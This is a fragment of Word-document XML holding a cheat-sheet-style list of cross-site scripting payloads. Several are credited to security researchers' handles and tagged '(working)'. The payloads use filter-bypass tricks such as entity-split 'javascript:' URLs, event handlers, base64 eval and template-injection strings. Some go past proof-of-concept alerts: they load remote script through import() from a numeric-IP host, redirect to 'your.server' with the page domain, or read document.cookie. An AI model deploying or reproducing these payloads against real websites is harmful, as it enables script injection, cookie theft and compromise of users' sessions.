        <w:t>'"&gt;&lt;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srcdoc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>='%26</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>lt;script&gt;;prompt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>`${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.domain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>}`%26lt;/script&gt;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DFA624" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="19F585BA" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;a href="j&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Tab;a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Tab;v</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Tab;asc</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>NewLine;ri</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Tab;pt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>colon;&amp;lpar;a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Tab;l</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Tab;e</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Tab;r</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Tab;t</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Tab;(document.domain)&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>rpar;"&gt;X&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B17F174" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="6096FAE1" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;--%253cimg%20onerror=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(1)%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>20src=a%253e --!&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2380CD" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="3C110400" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;a+HREF='%26%237javascrip%26%239</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>t:alert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>%26</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>lpar;document</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.domain)'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D3516F" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="0CE7FC93" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> alert`0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>` }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3AD14096" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="08A78247" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>1'"&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>img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onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=.1|alert``&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3D91B9" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="5E0C14F6" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="0036754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=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=import('//1152848220/')&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108D0866" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="0D87DB2B" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>%2sscript%2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ualert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)%2s/script%2u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEFB73F" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="1A55AF53" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on onload=(alert)(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.domain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6433C8E9" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="31AF709B" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ignored</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>=(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>prompt(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>1)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327FBB9B" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="694D0638" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549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onx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>=(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) onload=(confirm</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>)(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>1)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF4752C" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="1F40093B" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>“&gt;&lt;img%20src=x%20onmouseover=prompt%26%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>2300000000000000000040;document</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.cookie%26%2300000000000000000041;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AED3A7" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="2BFAA8DA" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on =</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> onload=alert(domain) (working)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2C7E59" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="27F7FD4B" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/onload=location/**/='https://your.server/'+document.domain&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBCDB5E" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="3B389D09" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549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onx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>=(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) onload=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>window.alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>?.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>()&gt; (working)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ED2DBA" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="76FFE8AC" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>test</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>",prompt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>%0A/*HelloWorld*/(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.domain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) (working)- @Brutelogic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528DFFDA" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="2C9D214B" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>+%00+onpointerenter%3dalert(domain)+x" (working)- @Brutelogic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2312FE95" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="2ABD66C8" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>"&gt;&lt;svg%20onload=alert%26%230000000040"1")&gt; (working)- @IamRenganathan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1CD987" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="50D1E5D6" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>%27%09</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>);%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>0d%0a%09%09[1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>].find</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(alert)//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6B1BC2" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="6B14B339" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"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=1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onmouseleave</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)&gt; - @itsgeekymonk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142C7211" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="0820C06F" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on onload=(alert)(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.domain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)&gt; -@</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zapstiko</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6B831606" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="1EF0CAC2" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/on%20onload=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>1)&gt; (working) -@</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aufzayed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="169F4195" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="76A3A114" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="`${x}</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>`;alert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(`</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ex.Mi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>`);"&gt; -@</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ex_mi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7E67860E" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="648EC8C9" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;style&gt;@keyframes a</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>{}b</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>animation:a;}&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/style&gt;&lt;b/onanimationstart=prompt`${</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.domain</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>}&amp;#x60;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C9CDA8" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>marquee+loop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=1+width=0+onfinish='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>new+Function`al</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\`1\``'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E39DFE" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="3130EBC5" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">&gt;&lt;circle&gt;&lt;set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onbegin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>prompt(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">1) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attributename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=fill&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD1BDE2" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="556E4E5B" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;dETAILS%0aopen%0aonToGgle%0a=%0aa=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>prompt,a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>() x&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C0EF4D" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="1BA90237" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>"%3balert`1`%3b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC6B606" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="0B41C6F2" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>asd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">"`&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onpointerenter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=x=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>prompt,x</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>`XSS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7579DF51" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="5F792979" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onauxclick</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=import('//1152848220/')&gt;click</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4638FB52" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="130E5601" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onauxclick</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=a=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert,a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(domain)&gt;click -@</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>niksthehacker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="28061658" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="0C93E75E" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onauxclick</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=import('//1152848220/')&gt;click</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211FB9DF" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="592A66BE" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onauxclick</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=import('//</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/')&gt;click</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB472D8" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="07A6B0EC" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>\"&lt;&gt;onauxclick&lt;&gt;=(eval)(atob(`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`))&gt;+&lt;sss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DE0928" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="0111F896" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>{{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>constructor.constructor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(alert`1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>`)(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297A36AF" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="5090A726" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>javascript:new</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>%20Function`al\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\`1\``;</w:t>
      </w:r>
    </w:p>
